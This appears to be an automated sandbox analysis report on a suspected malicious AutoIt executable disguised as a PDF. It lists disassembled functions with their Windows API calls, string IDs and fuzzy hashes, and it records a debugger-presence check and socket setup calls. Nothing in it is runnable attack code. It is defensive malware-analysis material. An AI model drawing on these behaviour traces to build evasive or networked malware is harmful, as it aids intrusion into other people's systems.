                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007C830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007C80C8,?,00000000,?,?), ref: 007C8322
                                                                                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                                                                                                                      • htons.WSOCK32(00000000,?,00000000), ref: 007C8108
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                      • String ID: 255.255.255.255
                                                                                                                      • API String ID: 2496851823-2422070025
                                                                                                                      • Opcode ID: 05aada6adccc7e7cbd85d7d9c1b7d374164d331864d67723836a9fa1ca5bf660
                                                                                                                      • Instruction ID: 1eb61b15e104da7bab7c1f5038f9e3882fec188ec0596107514ed416f1c38c58
                                                                                                                      • Opcode Fuzzy Hash: 05aada6adccc7e7cbd85d7d9c1b7d374164d331864d67723836a9fa1ca5bf660
                                                                                                                      • Instruction Fuzzy Hash: 2911E534600209ABCB10AFA4CC86FEDB774FF05320F14852FE91197291DB75A805C796
                                                                                                                      Function 007A92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007A9355
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: f2aeb9cd26b4020416258cc3965e93608ddf5655254c6fb205dab61d7fdb317c
                                                                                                                      • Instruction ID: f2d5b7a0b4b13ddb522954e5244a4589ef25c2ae7f9cf568e5284a9aa477c95e
                                                                                                                      • Opcode Fuzzy Hash: f2aeb9cd26b4020416258cc3965e93608ddf5655254c6fb205dab61d7fdb317c
                                                                                                                      • Instruction Fuzzy Hash: 8F01CC71A01214ABCF08EBA0CC968FE7769BB86320B100719FA72972D2DA29581C8650
                                                                                                                      Function 007A91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 007A924D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: 685249a4b52f4d6acf26947c8ab268d8745987356a088afc9377590ea5a78b3c
                                                                                                                      • Instruction ID: 58d8c7f50cf5723afc1990bc8461a6ae3a0bb8d3efe02f31169165cfe4c40560
                                                                                                                      • Opcode Fuzzy Hash: 685249a4b52f4d6acf26947c8ab268d8745987356a088afc9377590ea5a78b3c
                                                                                                                      • Instruction Fuzzy Hash: DE018471E41104BBCB18EBA0CD96EFF77A8EF86300F140219B912672D2EA5D5E1C9661
                                                                                                                      Function 007A9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 007A92D0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                                                                                                                      • Instruction ID: 4867b89c836f9d2bd0abd6bed38d714f2f675b09a5b999a9e9db5389d33658b4
                                                                                                                      • Opcode Fuzzy Hash: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                                                                                                                      • Instruction Fuzzy Hash: 7501A271E41108B7CB04EAA0CD96EFF77ACAF52301F244215B912A32D2DA695E1C9271
                                                                                                                      Function 007B51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                                                                                                                      • Instruction ID: f4bf998b72775070663e485973eb7fb81fb11f425a0301d426978af4ae87ffa4
                                                                                                                      • Opcode Fuzzy Hash: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                                                                                                                      • Instruction Fuzzy Hash: 32E02272A013282AE720AAA9AC49BE7FBACFB40771F00006BFD14D3040E5749A448BE0
                                                                                                                      Function 007A81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A81CA
                                                                                                                        • Part of subcall function 00773598: _doexit.LIBCMT ref: 007735A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: d34cc199003475bb9270a8235d6f7577059c3e5e6b411ceea43ff4c3ef95b12a
                                                                                                                      • Instruction ID: 131193799971421e00805ecc27a335b4509cf0378d717a28d7f278d286da99f7
                                                                                                                      • Opcode Fuzzy Hash: d34cc199003475bb9270a8235d6f7577059c3e5e6b411ceea43ff4c3ef95b12a
                                                                                                                      • Instruction Fuzzy Hash: 66D0123238535872D65432A96C0BBC56A484B05B56F508016FB0C955D389DE999152ED
                                                                                                                      Function 0078B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0078B564: _memset.LIBCMT ref: 0078B571
                                                                                                                        • Part of subcall function 00770B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B540,?,?,?,0075100A), ref: 00770B89
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B544
                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B553
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B54E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 3158253471-631824599
                                                                                                                      • Opcode ID: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                                                                                                                      • Instruction ID: c371e23d9fd8f2faefc858c0e06646e575cce4450d35a536a75e850f26264fbe
                                                                                                                      • Opcode Fuzzy Hash: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                                                                                                                      • Instruction Fuzzy Hash: 2BE039B06003118BD720EF28E8083427BE4AB04755F04C92DE886C26A1E7BCE408CBA1
                                                                                                                      Function 007D5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D5BF5
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5C08
                                                                                                                        • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                                                                                                                      • Instruction ID: a5e2a6f959efa799113e5c0697b287dd69f0f39e0319f28d92de14159d704a66
                                                                                                                      • Opcode Fuzzy Hash: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                                                                                                                      • Instruction Fuzzy Hash: 95D0C935389311B6E768AB70AC0FFD76B24AB00B51F044826F657AA1D0D9E89801C654